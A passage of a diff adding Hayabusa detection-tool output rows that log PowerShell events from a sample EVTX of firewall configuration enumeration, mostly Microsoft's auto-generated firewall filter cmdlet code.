Log,"function Get-NetFirewallInterfaceFilter { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] param( [Parameter(ParameterSetName='ByAssociatedNetFirewallRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = 
Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallRule') -and (@('ByAssociatedNetFirewallRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallRule}, 'MSFT_NetFirewallRuleFilterByInterface', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleFilterByInterface', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if 
($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallInterfaceFilter.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.864 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Set-NetFirewallInterfaceFilter { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] param( [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${InterfaceAlias}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] 
[Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object 
System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceAlias')) { [object]$__cmdletization_value = ${InterfaceAlias} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'InterfaceAlias'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'InterfaceAlias'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # 
.EXTERNALHELP NetFirewallInterfaceFilter.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.864 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log," 1.0.0.0 NetFirewallInterfaceTypeFilter ",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.864 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 if ($(Microsoft.PowerShell.Core\Get-Command Set-StrictMode -Module Microsoft.PowerShell.Core)) { Microsoft.PowerShell.Core\Set-StrictMode -Off } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetInterfaceTypeFilter' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = 'Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter' $script:PrivateData = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.Dictionary[string,string]' Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { 
$__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetFirewallInterfaceTypeFilter { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] param( [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType[]] ${InterfaceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByQuery')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('InterfaceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InterfaceType}) $__cmdletization_queryBuilder.FilterByProperty('InterfaceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallRule') -and (@('ByAssociatedNetFirewallRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallRule}, 'MSFT_NetFirewallRuleFilterByInterfaceType', 'GroupComponent', 
'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallInterfaceTypeFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetFirewallInterfaceTypeFilter' function Set-NetFirewallInterfaceTypeFilter { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] param( [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, 
[Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType] ${InterfaceType}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = 
$__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceType')) { [object]$__cmdletization_value = ${InterfaceType} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = 
$PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallInterfaceTypeFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetFirewallInterfaceTypeFilter'",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.879 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Get-Command): ""Get-Command"" ParameterBinding(Get-Command): name=""Module""; value=""Microsoft.PowerShell.Core"" ParameterBinding(Get-Command): name=""Name""; value=""Set-StrictMode""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.879 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; 
value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.879 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(New-Object): ""New-Object"" ParameterBinding(New-Object): name=""TypeName""; value=""System.Collections.Generic.Dictionary[string,string]""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.879 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.879 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetFirewallInterfaceTypeFilter""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.879 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" 
ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetFirewallInterfaceTypeFilter""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.879 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.879 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Get-NetFirewallInterfaceTypeFilter { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] param( [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType[]] ${InterfaceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule', Mandatory=$true, 
ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, 
